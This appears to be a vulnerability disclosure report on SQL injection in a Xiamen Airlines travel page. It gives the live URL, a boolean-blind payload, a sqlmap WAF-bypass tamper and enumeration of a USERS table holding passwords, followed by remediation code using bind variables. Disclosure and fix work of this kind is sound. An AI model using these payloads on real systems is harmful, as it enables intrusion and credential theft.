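2015-06-06: Details reported to the vendor; awaiting vendor response
2015-06-09: Vendor confirmed; details disclosed to the vendor only
2015-06-19: Details disclosed to core white hats and experts in related fields
2015-06-29: Details disclosed to regular white hats
2015-07-09: Details disclosed to trainee white hats
2015-07-24: Details disclosed to the public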
As the title says.
One SQL injection.
http://travel.xiamenair.com/Travel/Domestic.html?start=%7Cundefined&end=%25u53A6%25u95E8%7CXMN
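The end parameter is vulnerable to SQL injection. I ran sqlmap against it; because there is an F5 WAF in front, --tamper=greatest.py had to be added (purpose: bypass the filtering of '>' by replacing the greater-than sign with GREATEST).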
sqlmap identified the following injection points with a total of 261 HTTP(s) requests:
---
Parameter: end (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: start=|undefined&end=%u53A6%u95E8|XMN' AND 5242=5242 AND 'dwgq'='dwgq
    Vector: AND [INFERENCE]
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Oracle
current user: 'XMAIR'
current schema (equivalent to database on Oracle): 'XMAIR'
current user is DBA: False
available databases [4]:
[*] SYS
[*] SYSTEM
[*] XHSHOPADM
[*] XMAIR

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: end (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: start=|undefined&end=%u53A6%u95E8|XMN' AND 5242=5242 AND 'dwgq'='dwgq
    Vector: AND [INFERENCE]
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Oracle
No tables found

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: end (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: start=|undefined&end=%u53A6%u95E8|XMN' AND 5242=5242 AND 'dwgq'='dwgq
    Vector: AND [INFERENCE]
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Oracle

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: end (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: start=|undefined&end=%u53A6%u95E8|XMN' AND 5242=5242 AND 'dwgq'='dwgq
    Vector: AND [INFERENCE]
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Oracle
Database: XMAIR
[1 table]
+-------+
| USERS |
+-------+

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: end (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: start=|undefined&end=%u53A6%u95E8|XMN' AND 5242=5242 AND 'dwgq'='dwgq
    Vector: AND [INFERENCE]
---
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 4.0.30319
back-end DBMS: Oracle
Database: XMAIR
Table: USERS
[9 columns]
+-------------+-------------+
| Column      | Type        |
+-------------+-------------+
| DESCRIPTION | non-numeric |
| EMAIL       | non-numeric |
| PASSWORD    | numeric     |
| PRODUCT_ID  | numeric     |
| ROWID       | non-numeric |
| TITLE       | non-numeric |
| UID         | numeric     |
| USERID      | numeric     |
| USERNAME    | numeric     |
+-------------+-------------+
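I did not keep running it; it really is rather slow...
Filter the parameter.
Severity: Medium
Vulnerability Rank: 8
Confirmed at: 2015-06-09 08:48
Confirmed. Thank you for supporting Xiamen Airlines' information security work.
None yet.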
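The report shows the WAF filter in front of the end parameter being bypassed, so the durable fix sits in the query itself. The following is an added example, not code from the report or from the affected site: it contrasts string concatenation with a bind variable plus an allow-list on the "<city>|<airport code>" shape seen in the URL. sqlite3 stands in for Oracle, and the routes table and all function names are assumptions.

```python
import re
import sqlite3

def make_db():
    """Constructed stand-in for the booking database (assumed schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE routes (dest_code TEXT, title TEXT)")
    db.executemany("INSERT INTO routes VALUES (?, ?)",
                   [("XMN", "Xiamen package"), ("PEK", "Beijing package")])
    return db

def dest_code(end):
    # The report's URL carries end as "<city name>|<airport code>".
    return end.split("|", 1)[-1]

def search_concat(db, end):
    # "Before": the value is pasted into the SQL text, so a quote inside
    # it rewrites the WHERE clause.
    sql = "SELECT title FROM routes WHERE dest_code = '%s'" % dest_code(end)
    return [row[0] for row in db.execute(sql)]

def search_bound(db, end):
    # "After", step 1: the value travels as a bind variable and is only
    # ever compared as data.
    sql = "SELECT title FROM routes WHERE dest_code = ?"
    return [row[0] for row in db.execute(sql, (dest_code(end),))]

# Allow-list for the expected shape: city name, '|', three capital letters.
END_RE = re.compile(r"[^|]{1,32}\|[A-Z]{3}")

def search_hardened(db, end):
    # "After", step 2: reject anything that is not the expected shape.
    if END_RE.fullmatch(end) is None:
        raise ValueError("unexpected end value")
    return search_bound(db, end)

# Payload quoted from the sqlmap output above, and a constructed false twin.
TRUE_CASE = "\u53a6\u95e8|XMN' AND 5242=5242 AND 'dwgq'='dwgq"
FALSE_CASE = "\u53a6\u95e8|XMN' AND 5242=5243 AND 'dwgq'='dwgq"

if __name__ == "__main__":
    db = make_db()
    print(search_concat(db, TRUE_CASE), search_concat(db, FALSE_CASE))
    print(search_bound(db, TRUE_CASE), search_bound(db, FALSE_CASE))
    print(search_hardened(db, "\u53a6\u95e8|XMN"))
```

With concatenation the true and false cases return different results, which is the signal a boolean-based blind technique relies on; with the bind variable both return nothing, and the allow-list rejects them before any query runs.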